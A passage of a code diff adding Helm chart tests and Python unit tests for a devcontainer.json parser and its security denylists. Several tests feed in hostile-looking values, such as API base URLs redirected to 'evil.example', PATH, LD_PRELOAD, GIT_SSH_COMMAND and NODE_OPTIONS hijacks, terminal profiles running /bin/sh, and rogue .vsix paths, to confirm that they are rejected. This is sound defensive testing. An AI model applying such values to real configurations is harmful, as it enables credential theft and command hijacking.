+  # re-enables a feature an operator turned off. `dig` does not. Both flags are
+  # checked because both are booleans defaulting to true.
+  - it: honours an explicit enabled=false (dig, not default)
+    template: templates/deployment.yaml
+    set:
+      devcontainer.enabled: false
+    asserts:
+      - contains:
+          path: spec.template.spec.containers[0].env
+          content:
+            name: DEVCONTAINER_ENABLED
+            value: "false"
+
+  - it: honours an explicit autoApplyOnBoot=false
+    template: templates/deployment.yaml
+    set:
+      devcontainer.autoApplyOnBoot: false
+    asserts:
+      - contains:
+          path: spec.template.spec.containers[0].env
+          content:
+            name: DEVCONTAINER_AUTO_APPLY
+            value: "false"
+      # Turning off the boot pass must not turn off the whole feature — the
+      # read/report surface stays available.
+      - contains:
+          path: spec.template.spec.containers[0].env
+          content:
+            name: DEVCONTAINER_ENABLED
+            value: "true"
+
+  - it: honours a command timeout override
+    template: templates/deployment.yaml
+    set:
+      devcontainer.commandTimeoutSeconds: 120
+    asserts:
+      - contains:
+          path: spec.template.spec.containers[0].env
+          content:
+            name: DEVCONTAINER_TIMEOUT
+            value: "120"
+
+  # `| default dict` guard: a values file that predates this chart version has
+  # no `devcontainer:` key at all, and `dig` on a nil map is a template error.
+  - it: renders when the whole devcontainer section is absent
+    template: templates/deployment.yaml
+    set:
+      devcontainer: null
+    asserts:
+      - contains:
+          path: spec.template.spec.containers[0].env
+          content:
+            name: DEVCONTAINER_ENABLED
+            value: "true"
+      - contains:
+          path: spec.template.spec.containers[0].env
+          content:
+            name: DEVCONTAINER_TIMEOUT
+            value: "900"
+
+  # The feature adds no container — it is a module beside server.py, not a
+  # sidecar. deployment_test.yaml asserts against containers[0] by INDEX
+  # throughout, so an extra container inserted here would silently invalidate
+  # every one of those assertions instead of failing loudly. Two is the count
+  # under test-values.yaml (ide + dind, because it sets build.mode=buildkit).
+  - it: adds no container to the pod
+    template: templates/deployment.yaml
+    asserts:
+      - lengthEqual:
+          path: spec.template.spec.containers
+          count: 2
+      - equal:
+          path: spec.template.spec.containers[0].name
+          value: ide
+      - equal:
+          path: spec.template.spec.containers[1].name
+          value: dind

--- a/charts/workspace/tests/devcontainer_test.py
+++ b/charts/workspace/tests/devcontainer_test.py
@@ -1,0 +1,622 @@
+"""Unit tests for devcontainer.py — the pure half of devcontainer.json support (#594).
+
+The JSONC parser is the load-bearing correctness risk in the feature: every
+other behaviour depends on reading the file the same way Codespaces does. So
+the comment/trailing-comma passes get the bulk of the coverage, including the
+cases that break naive implementations (comment markers inside string values,
+escaped quotes, a trailing backslash, an unterminated block comment).
+
+The three denylists get equal weight for a different reason — they are the
+security boundary, and they matter even in a deployment that never executes a
+lifecycle command.
+
+Run with:
+    cd charts/workspace && python3 -m unittest tests.devcontainer_test
+"""
+
+import json
+import os
+import shutil
+import sys
+import tempfile
+import unittest
+
+HERE = os.path.dirname(os.path.abspath(__file__))
+sys.path.insert(0, os.path.dirname(HERE))
+import devcontainer as dc  # noqa: E402
+
+
+class JsoncTests(unittest.TestCase):
+    def test_plain_json(self):
+        self.assertEqual(dc.loads_jsonc('{"a": 1}'), {'a': 1})
+
+    def test_line_comments_stripped(self):
+        text = '{\n  // a comment\n  "a": 1 // trailing\n}'
+        self.assertEqual(dc.loads_jsonc(text), {'a': 1})
+
+    def test_block_comments_stripped(self):
+        text = '{ /* hello\n   world */ "a": 1 }'
+        self.assertEqual(dc.loads_jsonc(text), {'a': 1})
+
+    def test_offsets_and_line_count_preserved(self):
+        text = '{\n  // xxxx\n  /* y\n     z */\n  "a": 1\n}'
+        cleaned = dc.strip_comments(text)
+        self.assertEqual(len(cleaned), len(text))
+        self.assertEqual(cleaned.count('\n'), text.count('\n'))
+
+    def test_error_line_points_at_original_file(self):
+        # The bad token is on line 4 of the ORIGINAL text; the comment above it
+        # must not shift the reported position.
+        text = '{\n  // a comment that is quite long\n  "a": 1,\n  "b": nope\n}'
+        with self.assertRaises(dc.DevcontainerError) as ctx:
+            dc.loads_jsonc(text)
+        self.assertEqual(ctx.exception.line, 4)
+
+    def test_comment_markers_inside_strings_untouched(self):
+        text = '{"url": "https://example.com/x", "glob": "/* not a comment */"}'
+        got = dc.loads_jsonc(text)
+        self.assertEqual(got['url'], 'https://example.com/x')
+        self.assertEqual(got['glob'], '/* not a comment */')
+
+    def test_escaped_quote_inside_string(self):
+        text = r'{"a": "he said \"// hi\"", "b": 2}'
+        got = dc.loads_jsonc(text)
+        self.assertEqual(got['a'], 'he said "// hi"')
+        self.assertEqual(got['b'], 2)
+
+    def test_escaped_backslash_then_quote_ends_string(self):
+        # "a\\" is a string ending in one backslash; the // after it IS a comment.
+        text = '{"a": "c:\\\\" // comment\n, "b": 2}'
+        got = dc.loads_jsonc(text)
+        self.assertEqual(got['a'], 'c:\\')
+        self.assertEqual(got['b'], 2)
+
+    def test_trailing_backslash_at_eof_terminates(self):
+        with self.assertRaises(dc.DevcontainerError):
+            dc.loads_jsonc('{"a": "unterminated \\')
+
+    def test_trailing_commas_object_and_array(self):
+        text = '{"a": [1, 2, ], "b": 3, }'
+        self.assertEqual(dc.loads_jsonc(text), {'a': [1, 2], 'b': 3})
+
+    def test_trailing_comma_with_comment_between(self):
+        text = '{"a": [1, 2, // done\n]}'
+        self.assertEqual(dc.loads_jsonc(text), {'a': [1, 2]})
+
+    def test_comma_inside_string_not_stripped(self):
+        self.assertEqual(dc.loads_jsonc('{"a": "x, ]"}'), {'a': 'x, ]'})
+
+    def test_block_comments_do_not_nest(self):
+        # The FIRST */ closes; the trailing */ is then a syntax error.
+        with self.assertRaises(dc.DevcontainerError):
+            dc.loads_jsonc('{ /* a /* b */ "a": 1 */ }')
+
+    def test_unterminated_block_comment_raises_and_terminates(self):
+        with self.assertRaises(dc.DevcontainerError) as ctx:
+            dc.loads_jsonc('{ "a": 1 /* never closed')
+        self.assertIn('unterminated', str(ctx.exception))
+
+    def test_slash_slash_as_final_chars(self):
+        self.assertEqual(dc.loads_jsonc('{"a": 1}//'), {'a': 1})
+
+    def test_bom_and_crlf(self):
+        text = '\ufeff{\r\n  // c\r\n  "a": 1\r\n}\r\n'
+        self.assertEqual(dc.loads_jsonc(text), {'a': 1})
+
+    def test_empty_file_raises(self):
+        with self.assertRaises(dc.DevcontainerError):
+            dc.loads_jsonc('')
+
+    def test_non_object_top_level_raises(self):
+        with self.assertRaises(dc.DevcontainerError) as ctx:
+            dc.loads_jsonc('[1, 2]')
+        self.assertIn('top level', str(ctx.exception))
+
+    def test_lone_slash_is_a_syntax_error_not_a_hang(self):
+        with self.assertRaises(dc.DevcontainerError):
+            dc.loads_jsonc('{"a": / }')
+
+
+class FindConfigTests(unittest.TestCase):
+    def setUp(self):
+        self.tmp = tempfile.mkdtemp(prefix='kc-dc-find-')
+        self.addCleanup(shutil.rmtree, self.tmp, True)
+
+    def test_none(self):
+        self.assertEqual(dc.find_config(self.tmp), '')
+
+    def test_folder_form_wins_over_dotfile(self):
+        os.makedirs(os.path.join(self.tmp, '.devcontainer'))
+        open(os.path.join(self.tmp, '.devcontainer', 'devcontainer.json'), 'w').close()
+        open(os.path.join(self.tmp, '.devcontainer.json'), 'w').close()
+        self.assertEqual(dc.find_config(self.tmp),
+                         os.path.join(self.tmp, '.devcontainer', 'devcontainer.json'))
+
+    def test_dotfile_form(self):
+        open(os.path.join(self.tmp, '.devcontainer.json'), 'w').close()
+        self.assertEqual(dc.find_config(self.tmp),
+                         os.path.join(self.tmp, '.devcontainer.json'))
+
+    def test_subfolder_form_deterministic(self):
+        for name in ('zeta', 'alpha'):
+            os.makedirs(os.path.join(self.tmp, '.devcontainer', name))
+            open(os.path.join(self.tmp, '.devcontainer', name,
+                              'devcontainer.json'), 'w').close()
+        self.assertEqual(
+            dc.find_config(self.tmp),
+            os.path.join(self.tmp, '.devcontainer', 'alpha', 'devcontainer.json'))
+
+    def test_oversize_refused_before_read(self):
+        path = os.path.join(self.tmp, '.devcontainer.json')
+        with open(path, 'w') as f:
+            f.write('{"name": "' + ('x' * (dc.MAX_BYTES + 10)) + '"}')
+        with self.assertRaises(dc.DevcontainerError) as ctx:
+            dc.read_raw(path)
+        self.assertIn('limit', str(ctx.exception))
+
+
+class CommandTests(unittest.TestCase):
+    WD = '/home/dev/api'
+
+    def test_string_becomes_shell(self):
+        cmds = dc.normalize_commands('npm install', self.WD)
+        self.assertEqual(len(cmds), 1)
+        self.assertEqual(cmds[0]['kind'], 'shell')
+        self.assertEqual(cmds[0]['command'], 'npm install')
+
+    def test_array_becomes_argv(self):
+        cmds = dc.normalize_commands(['npm', 'ci', '--no-audit'], self.WD)
+        self.assertEqual(cmds[0]['kind'], 'argv')
+        self.assertEqual(cmds[0]['command'], ['npm', 'ci', '--no-audit'])
+
+    def test_object_runs_sequentially_in_key_order(self):
+        cmds = dc.normalize_commands(
+            {'install': 'npm i', 'build': ['make', 'all']}, self.WD)
+        self.assertEqual([c['name'] for c in cmds], ['install', 'build'])
+        self.assertEqual(cmds[1]['kind'], 'argv')
+        self.assertTrue(any('sequentially' in c for c in cmds[0]['caveats']))
+
+    def test_empty_and_missing(self):
+        self.assertEqual(dc.normalize_commands(None, self.WD), [])
+        self.assertEqual(dc.normalize_commands('   ', self.WD), [])
+
+    def test_bad_type_raises(self):
+        with self.assertRaises(dc.DevcontainerError):
+            dc.normalize_commands(42, self.WD)
+        with self.assertRaises(dc.DevcontainerError):
+            dc.normalize_commands([{'a': 1}], self.WD)
+
+    def test_sudo_and_apt_flagged_needs_root(self):
+        for text in ('sudo apt-get install -y jq', 'apk add curl',
+                     'docker compose up -d'):
+            cmds = dc.normalize_commands(text, self.WD)
+            self.assertTrue(cmds[0]['needs_root'], text)
+            self.assertTrue(cmds[0]['root_reasons'], text)
+
+    def test_ordinary_command_not_flagged(self):
+        cmds = dc.normalize_commands('npm ci && pip install --user -r req.txt',
+                                     self.WD)
+        self.assertFalse(cmds[0]['needs_root'])
+
+    def test_workspace_folder_variable_substituted(self):
+        cmds = dc.normalize_commands('cd ${workspaceFolder} && ls', self.WD)
+        self.assertEqual(cmds[0]['command'], 'cd /home/dev/api && ls')
+
+    def test_local_env_variable_not_substituted(self):
+        cmds = dc.normalize_commands('echo ${localEnv:ANTHROPIC_API_KEY}', self.WD)
+        self.assertIn('${localEnv:ANTHROPIC_API_KEY}', cmds[0]['command'])
+        self.assertTrue(any('unresolved' in c for c in cmds[0]['caveats']))
+
+    def test_hook_hash_stable_and_discriminating(self):
+        a = dc.hook_hash(dc.normalize_commands('npm ci', self.WD))
+        b = dc.hook_hash(dc.normalize_commands('npm ci', self.WD))
+        c = dc.hook_hash(dc.normalize_commands('npm ci --force', self.WD))
+        self.assertEqual(a, b)
+        self.assertNotEqual(a, c)
+
+
+class PortTests(unittest.TestCase):
+    def test_labels_from_ports_attributes(self):
+        ok, skipped = dc.normalize_ports(
+            [3000, '5173'], {'3000': {'label': 'API'}})
+        self.assertEqual(ok[0], {'port': 3000, 'label': 'API'})
+        self.assertEqual(ok[1]['label'], 'port 5173')
+        self.assertEqual(skipped, [])
+
+    def test_internal_ports_skipped_with_reason(self):
+        ok, skipped = dc.normalize_ports([8080, 7681, 3000], None)
+        self.assertEqual([p['port'] for p in ok], [3000])
+        self.assertEqual(len(skipped), 2)
+        self.assertIn('reserved', skipped[0]['reason'])
+
+    def test_host_port_form_rejected(self):
+        ok, skipped = dc.normalize_ports(['db:5432'], None)
+        self.assertEqual(ok, [])
+        self.assertIn('single pod', skipped[0]['reason'])
+
+    def test_out_of_range_and_junk(self):
+        ok, skipped = dc.normalize_ports([0, 70000, 'x', True, None], None)
+        self.assertEqual(ok, [])
+        self.assertEqual(len(skipped), 5)
+
+    def test_duplicates_collapse(self):
+        ok, _ = dc.normalize_ports([3000, 3000, '3000'], None)
+        self.assertEqual(len(ok), 1)
+
+
+class ExtensionTests(unittest.TestCase):
+    def test_valid_ids_accepted(self):
+        ok, bad = dc.normalize_extensions(
+            ['ms-python.python', 'dbaeumer.vscode-eslint', 'foo.bar@1.2.3'])
+        self.assertEqual(len(ok), 3)
+        self.assertEqual(bad, [])
+
+    def test_leading_dash_rejected(self):
+        # Would be read as a flag by code-server --install-extension.
+        ok, bad = dc.normalize_extensions(['--force'])
+        self.assertEqual(ok, [])
+        self.assertTrue(bad)
+
+    def test_paths_and_vsix_rejected(self):
+        ok, bad = dc.normalize_extensions(
+            ['./evil.vsix', '../../tmp/x.vsix', '/abs/path.vsix',
+             'sub/dir.thing'])
+        self.assertEqual(ok, [])
+        self.assertEqual(len(bad), 4)
+        self.assertIn('file path', bad[0]['reason'])
+
+    def test_non_strings_and_dupes(self):
+        ok, bad = dc.normalize_extensions(['a.b', 'A.B', 5, ''])
+        self.assertEqual(ok, ['a.b'])
+        self.assertEqual(len(bad), 1)
+
+
+class SettingTests(unittest.TestCase):
+    def test_ordinary_settings_accepted(self):
+        ok, denied = dc.normalize_settings(
+            {'editor.formatOnSave': True, 'files.eol': '\n'})
+        self.assertEqual(len(ok), 2)
+        self.assertEqual(denied, [])
+
+    def test_terminal_profiles_denied(self):
+        ok, denied = dc.normalize_settings({
+            'terminal.integrated.profiles.linux': {'evil': {'path': '/bin/sh'}},
+            'terminal.integrated.defaultProfile.linux': 'evil',
+            'terminal.integrated.automationProfile.linux': {},
+            'terminal.integrated.env.linux': {'X': '1'},
+        })
+        self.assertEqual(ok, {})
+        self.assertEqual(len(denied), 4)
+
+    def test_executable_path_settings_denied(self):
+        ok, denied = dc.normalize_settings({
+            'python.defaultInterpreterPath': './venv/bin/python',
+            'go.alternateTools.serverPath': '/x',
+            'rust-analyzer.server.extraEnv.shellArgs': 'x',
+            'git.path': '/tmp/git',
+        })
+        self.assertEqual(ok, {})
+        self.assertEqual(len(denied), 4)
+
+    def test_workspace_trust_and_remote_denied(self):
+        ok, denied = dc.normalize_settings({
+            'security.workspace.trust.enabled': False,
+            'remote.SSH.path': '/x',
+            'http.proxy': 'http://evil',
+        })
+        self.assertEqual(ok, {})
+        self.assertEqual(len(denied), 3)
+
+    def test_invalid_key_and_huge_value(self):
+        ok, denied = dc.normalize_settings({
+            'bad key!': 1, 'editor.x': 'y' * (9000)})
+        self.assertEqual(ok, {})
+        self.assertEqual(len(denied), 2)
+
+
+class EnvTests(unittest.TestCase):
+    def test_ordinary_env_accepted(self):
+        ok, denied = dc.normalize_env({'NODE_ENV': 'development', 'PORT': '3000'})
+        self.assertEqual(ok, {'NODE_ENV': 'development', 'PORT': '3000'})
+        self.assertEqual(denied, [])
+
+    def test_provider_prefixes_denied(self):
+        ok, denied = dc.normalize_env({
+            'ANTHROPIC_BASE_URL': 'https://evil.example',
+            'OPENAI_API_KEY': 'x', 'GH_TOKEN': 'x', 'GITHUB_TOKEN': 'x',
+            'KC_ANYTHING': 'x', 'CLAUDE_CODE_X': 'x',
+        })
+        self.assertEqual(ok, {})
+        self.assertEqual(len(denied), 6)
+
+    def test_shell_hijack_vars_denied(self):
+        ok, denied = dc.normalize_env({
+            'PATH': '/evil:$PATH', 'LD_PRELOAD': '/tmp/x.so',
+            'BASH_ENV': '/tmp/rc', 'GIT_SSH_COMMAND': 'sh -c evil',
+            'NODE_OPTIONS': '--require /tmp/x', 'HOME': '/tmp',
+        })
+        self.assertEqual(ok, {})
+        self.assertEqual(len(denied), 6)
+
+    def test_bad_names_and_values(self):
+        ok, denied = dc.normalize_env({
+            '1BAD': 'x', 'GOOD': 'a\nb', 'ALSO': {'not': 'a string'},
+            'BOOLY': True})
+        self.assertEqual(ok, {})
+        self.assertEqual(len(denied), 4)
+
+    def test_variables_substituted_in_values(self):
+        ok, _ = dc.normalize_env({'ROOT': '${workspaceFolder}/src'},
+                                 '/home/dev/api')
+        self.assertEqual(ok['ROOT'], '/home/dev/api/src')
+
+
+class WorkspaceFolderTests(unittest.TestCase):
+    WD = '/home/dev/api'
+
+    def test_absent_maps_to_workdir(self):
+        self.assertEqual(dc.map_workspace_folder(self.WD, None), (self.WD, ''))
+
+    def test_canonical_container_path_maps(self):
+        self.assertEqual(
+            dc.map_workspace_folder(self.WD, '/workspaces/api'), (self.WD, ''))
+
+    def test_subpath_maps(self):
+        got, caveat = dc.map_workspace_folder(self.WD, '/workspaces/api/server')
+        # normpath: the function returns a NATIVE path, which only differs from
+        # the POSIX form when the suite runs on a developer's Windows box.
+        self.assertEqual(got, os.path.normpath('/home/dev/api/server'))
+        self.assertEqual(caveat, '')
+
+    def test_foreign_absolute_path_refused_with_caveat(self):
+        got, caveat = dc.map_workspace_folder(self.WD, '/etc')
+        self.assertEqual(got, self.WD)
+        self.assertIn('does not map', caveat)
+
+    def test_traversal_refused(self):
+        got, caveat = dc.map_workspace_folder(self.WD, '../../etc')
+        self.assertEqual(got, self.WD)
+        self.assertIn('escapes', caveat)
+
+    def test_non_string_refused(self):
+        got, caveat = dc.map_workspace_folder(self.WD, 42)
+        self.assertEqual(got, self.WD)
+        self.assertTrue(caveat)
+
+
+class ClassifyTests(unittest.TestCase):
+    def test_features_is_blocking_with_reason_and_remedy(self):
+        out = dc.classify_unsupported(
+            {'features': {'ghcr.io/devcontainers/features/node:1': {}}})
+        self.assertEqual(len(out), 1)
+        entry = out[0]
+        self.assertEqual(entry['severity'], 'blocking')
+        self.assertIn('UID 1000', entry['reason'])
+        self.assertIn('postCreateCommand', entry['remedy'])
+        self.assertIn('node', entry['detail'])
+
+    def test_image_build_compose_blocking(self):
+        out = dc.classify_unsupported({
+            'image': 'node:20', 'build': {'dockerfile': 'Dockerfile'},
+            'dockerComposeFile': 'compose.yml'})
+        self.assertEqual({e['key'] for e in out},
+                         {'image', 'build', 'dockerComposeFile'})
+        self.assertTrue(all(e['severity'] == 'blocking' for e in out))
+
+    def test_initialize_and_post_attach_ignored(self):
+        out = dc.classify_unsupported({
+            'initializeCommand': 'echo hi', 'postAttachCommand': 'echo bye'})
+        self.assertTrue(all(e['severity'] == 'ignored' for e in out))
+
+    def test_empty_values_not_reported(self):
+        self.assertEqual(dc.classify_unsupported(
+            {'features': {}, 'mounts': [], 'image': ''}), [])
+
+    def test_supported_keys_never_reported(self):
+        out = dc.classify_unsupported({
+            'name': 'x', 'forwardPorts': [3000], 'postCreateCommand': 'npm i',
+            'customizations': {'vscode': {'extensions': []}}})
+        self.assertEqual(out, [])
+
+    def test_other_tool_customizations_reported(self):
+        out = dc.classify_unsupported({'customizations': {'jetbrains': {}}})
+        self.assertEqual(out[0]['key'], 'customizations.jetbrains')
+
+    def test_blocking_sorts_first(self):
+        out = dc.classify_unsupported({
+            'initializeCommand': 'x', 'image': 'y', 'mounts': ['z']})
+        self.assertEqual([e['severity'] for e in out],
+                         ['blocking', 'partial', 'ignored'])
+
+
+class ParseTests(unittest.TestCase):
+    def setUp(self):
+        self.tmp = os.path.realpath(tempfile.mkdtemp(prefix='kc-dc-parse-'))
+        self.addCleanup(shutil.rmtree, self.tmp, True)
+
+    def _write(self, obj_or_text):
+        os.makedirs(os.path.join(self.tmp, '.devcontainer'), exist_ok=True)
+        path = os.path.join(self.tmp, '.devcontainer', 'devcontainer.json')
+        text = obj_or_text if isinstance(obj_or_text, str) else json.dumps(obj_or_text)
+        with open(path, 'w', encoding='utf-8') as f:
+            f.write(text)
+        return path
+
+    def test_absent(self):
+        rec = dc.parse(self.tmp)
+        self.assertFalse(rec['found'])
+        self.assertEqual(rec['error'], '')
+
+    def test_full_record(self):
+        self._write({
+            'name': 'Node 20 + Postgres',
+            'forwardPorts': [3000, 8080],
+            'portsAttributes': {'3000': {'label': 'API'}},
+            'postCreateCommand': 'npm ci',
+            'postStartCommand': ['npm', 'start'],
+            'containerEnv': {'NODE_ENV': 'development', 'PATH': '/evil'},
+            'customizations': {'vscode': {
+                'extensions': ['ms-python.python', './evil.vsix'],
+                'settings': {'editor.formatOnSave': True,
+                             'terminal.integrated.profiles.linux': {}},
+            }},
+            'features': {'ghcr.io/devcontainers/features/node:1': {}},
+        })
+        rec = dc.parse(self.tmp)
+        self.assertTrue(rec['found'])
+        self.assertEqual(rec['error'], '')
+        self.assertEqual(rec['name'], 'Node 20 + Postgres')
+        self.assertEqual([p['port'] for p in rec['ports']], [3000])
+        self.assertEqual(len(rec['ports_skipped']), 1)
+        self.assertEqual(rec['extensions'], ['ms-python.python'])
+        self.assertEqual(len(rec['extensions_rejected']), 1)
+        self.assertEqual(rec['settings'], {'editor.formatOnSave': True})
+        self.assertEqual(len(rec['settings_denied']), 1)
+        self.assertEqual(rec['env'], {'NODE_ENV': 'development'})
+        self.assertEqual(len(rec['env_denied']), 1)
+        self.assertEqual(len(rec['lifecycle']['postCreate']), 1)
+        self.assertEqual(len(rec['lifecycle']['postStart']), 1)
+        self.assertEqual(rec['lifecycle']['onCreate'], [])
+        self.assertTrue(any(u['key'] == 'features' for u in rec['unsupported']))
+        self.assertEqual(len(rec['config_hash']), 64)
+
+    def test_unparseable_reports_error_not_raise(self):
+        self._write('{ "a": nope }')
+        rec = dc.parse(self.tmp)
+        self.assertTrue(rec['found'])
+        self.assertIn('invalid JSON', rec['error'])
+        self.assertEqual(rec['error_line'], 1)
+
+    def test_needs_root_surfaces_as_unsupported(self):
+        self._write({'postCreateCommand': 'sudo apt-get install -y jq'})
+        rec = dc.parse(self.tmp)
+        self.assertTrue(rec['needs_root'])
+        self.assertTrue(any('root' in u['key'] for u in rec['unsupported']))
+
+    def test_per_hook_hash_isolation(self):
+        """Editing forwardPorts must NOT stale a successful postCreate."""
+        self._write({'postCreateCommand': 'npm ci', 'forwardPorts': [3000]})
+        first = dc.parse(self.tmp)
+        self._write({'postCreateCommand': 'npm ci', 'forwardPorts': [3000, 4000]})
+        second = dc.parse(self.tmp)
+        self.assertNotEqual(first['config_hash'], second['config_hash'])
+        self.assertEqual(first['hook_hashes']['postCreate'],
+                         second['hook_hashes']['postCreate'])
+
+    def test_commands_run_in_mapped_workspace_folder(self):
+        self._write({'workspaceFolder': '/workspaces/{}/srv'.format(
+            os.path.basename(self.tmp)), 'postCreateCommand': 'echo ${workspaceFolder}'})
+        rec = dc.parse(self.tmp)
+        self.assertEqual(rec['workspace_folder'], os.path.join(self.tmp, 'srv'))
+        self.assertIn(os.path.join(self.tmp, 'srv'),
+                      rec['lifecycle']['postCreate'][0]['command'])
+
+    def test_summarize_is_counts_only(self):
+        self._write({'name': 'X', 'forwardPorts': [3000],
+                     'postCreateCommand': 'npm ci',
+                     'features': {'a': {}}})
+        s = dc.summarize(self.tmp)
+        self.assertEqual(s['ports'], 1)
+        self.assertEqual(s['hooks'], {'postCreate': 1})
+        self.assertEqual(s['blocking'], 1)
+        self.assertEqual(s['blocking_keys'], ['features'])
+
+    def test_summarize_absent_and_broken(self):
+        self.assertEqual(dc.summarize(self.tmp), {'found': False})
+        self._write('{ oops')
+        s = dc.summarize(self.tmp)
+        self.assertTrue(s['found'])
+        self.assertTrue(s['error'])
+
+
+class StateTests(unittest.TestCase):
+    def setUp(self):
+        self.tmp = os.path.realpath(tempfile.mkdtemp(prefix='kc-dc-state-'))
+        self.addCleanup(shutil.rmtree, self.tmp, True)
+        self._state_dir = dc.STATE_DIR
+        self._boot = dc.BOOT_MARKER
+        dc.STATE_DIR = os.path.join(self.tmp, '.claude-devcontainer')
+        dc.BOOT_MARKER = os.path.join(self.tmp, 'boot')
+
+    def tearDown(self):
+        dc.STATE_DIR = self._state_dir
+        dc.BOOT_MARKER = self._boot
+
+    def test_roundtrip_atomic_and_0600(self):
+        dc.put_record('/home/dev/api', {'config_hash': 'abc'})
+        self.assertEqual(dc.get_record('/home/dev/api')['config_hash'], 'abc')
+        if os.name == 'posix':   # Windows chmod only honours the read-only bit
+            mode = os.stat(dc.state_path()).st_mode & 0o777
+            self.assertEqual(mode, 0o600)
+        self.assertEqual(
+            [n for n in os.listdir(dc.STATE_DIR) if n.startswith('state.json.tmp')],
+            [])
+
+    def test_missing_and_corrupt_state_degrade_to_empty(self):
+        self.assertEqual(dc.read_state()['workdirs'], {})
+        dc.ensure_dirs()
+        with open(dc.state_path(), 'w') as f:
+            f.write('not json')
+        self.assertEqual(dc.read_state()['workdirs'], {})
+
+    def test_drop_record(self):
+        dc.put_record('/a', {'x': 1})
+        self.assertTrue(dc.drop_record('/a'))
+        self.assertFalse(dc.drop_record('/a'))
+
+    def test_boot_id_is_stable_within_a_boot(self):
+        first = dc.boot_id()
+        self.assertEqual(first, dc.boot_id())
+        os.remove(dc.BOOT_MARKER)          # simulates a pod restart wiping /tmp
+        self.assertNotEqual(first, dc.boot_id())
+
+    def _parsed(self, **hooks):
+        life = {h: [] for h in dc.HOOKS}
+        life.update(hooks)
+        return {'lifecycle': life,
+                'hook_hashes': {h: dc.hook_hash(life[h]) for h in dc.HOOKS}}
+
+    def test_lifecycle_status_none_and_pending(self):
+        cmds = [{'name': '', 'kind': 'shell', 'command': 'npm ci'}]
+        st = dc.lifecycle_status(self._parsed(postCreate=cmds), {})
+        self.assertEqual(st['onCreate']['status'], 'none')
+        self.assertEqual(st['postCreate']['status'], 'pending')
+
+    def test_lifecycle_status_done_stale_failed(self):
+        cmds = [{'name': '', 'kind': 'shell', 'command': 'npm ci'}]
+        parsed = self._parsed(postCreate=cmds)
+        h = parsed['hook_hashes']['postCreate']
+        done = {'lifecycle': {'postCreate': {'hook_hash': h, 'status': 'ok'}}}
+        self.assertEqual(
+            dc.lifecycle_status(parsed, done)['postCreate']['status'], 'done')
+        stale = {'lifecycle': {'postCreate': {'hook_hash': 'other', 'status': 'ok'}}}
+        self.assertEqual(
+            dc.lifecycle_status(parsed, stale)['postCreate']['status'], 'stale')
+        failed = {'lifecycle': {'postCreate': {'hook_hash': h, 'status': 'failed',
+                                               'exit_code': 100}}}
+        got = dc.lifecycle_status(parsed, failed)['postCreate']
+        self.assertEqual(got['status'], 'failed')
+        self.assertEqual(got['exit_code'], 100)
+
+    def test_post_start_is_pending_on_a_new_boot(self):
+        cmds = [{'name': '', 'kind': 'shell', 'command': 'npm start'}]
+        parsed = self._parsed(postStart=cmds)
+        h = parsed['hook_hashes']['postStart']
+        rec = {'lifecycle': {'postStart': {'hook_hash': h, 'status': 'ok',
+                                           'boot_id': 'old-boot'}}}
+        self.assertEqual(
+            dc.lifecycle_status(parsed, rec, current_boot='new-boot')['postStart']
+            ['status'], 'pending')
+        self.assertEqual(
+            dc.lifecycle_status(parsed, rec, current_boot='old-boot')['postStart']
+            ['status'], 'done')
+
+    def test_log_path_is_slugified_and_contained(self):
+        dc.ensure_dirs()
+        p = dc.log_path_for('/home/dev/../../etc/api', 'postCreate', when=1)
+        self.assertTrue(p.startswith(dc.log_dir() + os.sep))
+        self.assertNotIn('..', os.path.basename(p))
+
+
+if __name__ == '__main__':
+    unittest.main()

--- a/charts/workspace/tests/projects_test.py
+++ b/charts/workspace/tests/projects_test.py
@@ -662,6 +662,170 @@ class HandlerTests(ProjectsManagerBase):
         disc.assert_called_once_with(auto_provision=True)
 
 
+# ──────────────────── devcontainer.json integration (#594) ────────────────
+
+class DevcontainerIntegrationTests(ProjectsManagerBase):
+    """The four places devcontainer.json touches the project registry.
+
+    PROJECT_MARKERS is the one that carries risk: it feeds discover()'s
+    auto-provision as well as the new-task picker, so adding entries makes
+    directories that were previously invisible register themselves. That is
+    intended (#594) and therefore asserted rather than left to be discovered
+    in production.
+    """
+
+    def setUp(self):
+        super().setUp()
+        self.tmp = os.path.realpath(tempfile.mkdtemp(prefix='kctest-dc-'))
+        self.addCleanup(shutil.rmtree, self.tmp, True)
+        # These tests need REAL files on disk, so the registry's /home/dev
+        # confinement (_normalize) has to point at the tempdir — otherwise
+        # create() rejects every workdir and nothing auto-provisions.
+        self._orig_home_root = PM.HOME_ROOT
+        PM.HOME_ROOT = self.tmp
+        self.addCleanup(lambda: setattr(PM, 'HOME_ROOT', self._orig_home_root))
+
+    def _patch_memory(self, rows):
+        return mock.patch.object(server, 'MemoryManager', _FakeMemory(rows))
+
+    def _make(self, name, config=None, dotfile=False):
+        path = os.path.join(self.tmp, name)
+        os.makedirs(path, exist_ok=True)
+        if config is None:
+            return path
+        if dotfile:
+            target = os.path.join(path, '.devcontainer.json')
+        else:
+            os.makedirs(os.path.join(path, '.devcontainer'), exist_ok=True)
+            target = os.path.join(path, '.devcontainer', 'devcontainer.json')
+        with open(target, 'w', encoding='utf-8') as f:
+            f.write(config if isinstance(config, str) else json.dumps(config))
+        return path
+
+    # ── markers ──────────────────────────────────────────────────────────
+
+    def test_devcontainer_alone_makes_a_directory_a_project(self):
+        """The slash-bearing marker entry is the non-obvious part: it works
+        because list_dirs does os.path.exists(join(path, m)), not a listdir
+        membership test."""
+        self._make('folder-form', {'name': 'A'})
+        self._make('dotfile-form', {'name': 'B'}, dotfile=True)
+        self._make('nothing')
+        with mock.patch.object(server.WorkspaceManager, 'HOME_DIR', self.tmp):
+            dirs = {d['label']: d for d in server.WorkspaceManager.list_dirs()}
+        self.assertTrue(dirs['folder-form']['is_project'])
+        self.assertTrue(dirs['folder-form']['has_devcontainer'])
+        self.assertTrue(dirs['dotfile-form']['is_project'])
+        self.assertTrue(dirs['dotfile-form']['has_devcontainer'])
+        self.assertFalse(dirs['nothing']['is_project'])
+        self.assertFalse(dirs['nothing']['has_devcontainer'])
+
+    # ── discovery ────────────────────────────────────────────────────────
+
+    def test_discover_treats_a_devcontainer_as_high_confidence(self):
+        """An explicit human declaration beats a stray Makefile — so a bare
+        devcontainer dir auto-provisions where a bare marker dir does not."""
+        self._make('api', {'name': 'Payments API'})
+        fake_dirs = [{'path': os.path.join(self.tmp, 'api'), 'label': 'api',
+                      'is_git_repo': False, 'is_project': True,
+                      'has_devcontainer': True, 'mtime': 5}]
+        with mock.patch.object(server.WorkspaceManager, 'list_dirs',
+                               return_value=fake_dirs), \
+             mock.patch.object(server, 'MemoryManager', _FakeMemory([])):
